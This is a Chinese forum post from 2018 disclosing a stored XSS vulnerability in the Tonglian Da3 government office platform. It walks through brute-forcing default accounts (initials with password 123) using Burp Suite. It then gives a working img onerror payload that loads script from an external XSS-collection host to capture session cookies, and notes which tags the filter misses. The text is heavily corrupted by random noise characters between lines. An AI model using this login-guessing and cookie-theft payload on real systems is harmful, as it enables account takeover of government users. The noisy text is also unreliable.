( r" @$ e* U9 z* ?8 z6 G# G
: @% r5 Z+ H5 S" M k" ~; Z- ]* u 同联Da3协同办公平台后台通用储存型xss漏洞) p: x+ f& N! g" |4 {6 `
. G5 }" E9 `+ D( V9 A
" U' C/ ?1 l: _2 b: S
平台简介:
3 Y7 ^6 c9 v- A, Z1 D! J; m
+ I2 y; l0 J% U* T" w. u" L
3 R" O# P2 @: z; n1 z% J( m
# X, ]6 ^, A7 a6 I& Z
1 o( p5 Z8 L2 G6 v1 }
1 w& z& D2 n$ [+ N$ m- w7 T( L/ c 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
6 h" T: N2 `2 U: n1 L) w3 N同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
0 Z4 z7 \8 I: \9 x; L7 ^+ h7 ^
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
6 X! E6 ]6 c, A
4 D2 y- {8 R" `8 \3 `0 X/ p' [& |
+ t3 ^7 M0 m$ e$ \" c% c
/ J4 ]9 x7 ^* g$ b# I" {: H! F/ W
: M6 q2 J, k) B" j0 i I* o6 Y % J! Y: w4 A9 r+ P8 c
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
6 W ]' y6 B7 m @
% M' Q. y a# i9 u+ R K
. I! ~. K: j& k $ O2 @* a7 p# W7 {( N0 Z% ^
* M7 l6 e3 G0 R) T: W% v
( }) H& z% S! T7 `/ r5 S9 u9 J http://1.1.1.1:7197/cap-aco/#(案例2-)% u7 P5 f( N; K* a
& h* P8 o8 m! ]0 o$ n
- J2 [9 z1 [3 a1 s; Z5 t) q% O http://www.XXOO.com (案例1-官网网站); M& X+ \. h1 D9 J* ~9 s' u
. K+ U3 s# P6 B W2 B
7 d6 t* n+ z, Q0 k9 m$ Q1 e! ?
漏洞详情:% a | K# d! _2 ?* d
1 h! ?( K& E* f6 A0 N% n/ M
1 o. p [6 c' }$ d. B% G' R5 _
案例一、 h& g- x6 D6 h/ ^8 R2 b
8 v4 I% P8 n$ J- _4 k/ P5 Q4 ]3 M3 g
' T+ I) j$ n2 G) `2 N( N 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试1 }2 ]4 h% L- n! J* y
7 O5 ]+ C) z8 O" J! l% `
$ t. T4 K5 \3 a/ Y9 x 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
2 A; N' V+ W+ ]: I% `$ z; s; ]/ B
; y' Q. q6 F+ @) q* g" E" n! E" t
* {3 M- ~5 W! Q" N" ^0 b 1 A1 U9 I& h- [" U5 g2 n
$ B' `! K# i+ F" ~
* p' C( H% K& ]2 i 
9 @' i/ Q0 }4 e$ k
3 X" G" ]( l7 f
+ d' v- g8 p2 }# u# _
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 3 A& g# }& s2 L) l$ B: F% R
; B( D2 Q- z) p
9 ]" A4 V9 @4 G4 e% j. u; I% v 6 r* }( b. M; B% z9 z% { C
0 w. O d& L! y- _, J' {* o% x `' p; l
1 @% }% D ^" F4 E 
4 Q* T7 ~3 i9 W* h5 g" q
5 w# [ v9 Z, H9 E7 _2 x
. G- v+ l, N/ U+ f) X# ?: _
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
/ y% J1 F. L, l: f- x ^
6 Y% A, y/ {0 A+ b# K: C* `
# J3 b* }. v! B
0 |# L- L: b& k! q( r
) f$ p& U" @. x$ R/ b- b2 t / K5 v- }& e) Z8 n
<img src=x7 v. U0 ]" r" V" y; u7 n. o! L+ j7 ~
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 2 \, Y1 T8 o n0 p0 x
# W) n: g. L+ e. @/ c2 h1 `
( r& }2 F) k( o. } 
0 ~9 T4 x. |/ N A* I% i7 Y8 _4 \
1 k, s$ X( e t5 y' _& K7 |6 i" Z
7 ^& I, M& x4 k2 g* v
然后发送,接收cookie如图:
+ t# v `0 n; Z- M ~
% j' X1 r2 y" v% I 4 f; d2 Z0 j0 Q/ S% ^
5 R2 P @9 T; a3 Y0 y. z0 _
+ ^/ L) Q. x& ?+ H* ~. C 2 c$ p" i' y& g7 \ [
; K4 g( Y* ] h; u% s- z
. X( i/ q2 [+ k5 a
* M8 t/ u4 [, [- X- D2 c. u
5 ?4 [9 [& w+ r/ i0 L, o8 D
9 r& g& i* ]& H& _ ( n' g' U2 \ p6 N& m+ o* c
: h/ V, F6 d4 h# W$ W
* D0 |( U0 G+ o( e + o8 n; p6 y# b- z# M+ m& A
7 k2 L" D8 y4 j& `; w
3 a* p4 T' ]. c |6 L9 n
# W) g$ B* O1 f9 N) Z1 Z I. ^ 
/ m, _; Z( {" A& D
m9 u" i% O, X D3 D/ V
5 ^0 _0 i1 z! R% b H& A
8 x2 L! I+ O$ I: m" w4 e
2 F# o& F9 E+ W& Q' ]/ | l
4 c3 n+ r( o& k 案例2、
# e, y! t9 x: T- B: O2 ]$ x
; k+ V% X- v+ h! F" U4 Z6 J4 q/ s " d* ^) M; \4 }: X
前面步骤都一样,下面看效果图: 9 I$ i1 A" S1 t! M# d
& `, m) @, q' |, L3 ?
, M' }) c$ |7 O, h
/ ^( B6 g6 Y6 N0 [; @$ ~5 O/ I
, [. ?0 }4 s Q( y2 V, f' [" {
: ?" {' _) i/ r7 T& G
! f6 O' m4 Z. \$ P3 `2 s. k9 `- V7 ~
) a5 W- j0 P' v4 O; m! z7 Y" [0 f1 I
6 [: ^( N$ k9 S% V) R
$ L2 l2 S# J" M0 E* D
) v4 t% e/ i% _6 Y ' d, L/ s! r( ]0 s4 i* E b
- ^# [5 F6 M/ o: J$ c7 J
1 j; W; Q6 ?( ]+ A0 n' N$ h
4 ]! b# z o# K1 t 
" M6 k' _4 Z* {9 @2 w- u6 O
, P: m% M: r, ]5 j+ H
2 Y: d9 a$ g% R' W! l/ E- |" X t# o. b7 X0 A1 T+ ^
4 y, ?6 s# ]% M; ^9 R* ` : M; Y1 v. N O' o
5 F2 V3 I; H% U. Y6 L% x) S. e
8 g* G" |. N1 @$ D! M. I
& D( d- ~0 E3 H7 Z
" a" i2 Q k' ~1 c
3 _3 I/ ]+ t1 G
* @# s" ]3 c) r1 r/ \( O( x- V
+ F. ~# u* f5 G9 P% r, e
/ g5 X; `5 v9 T 
发表于 2018-10-20 20:14:15
收藏
支持
反对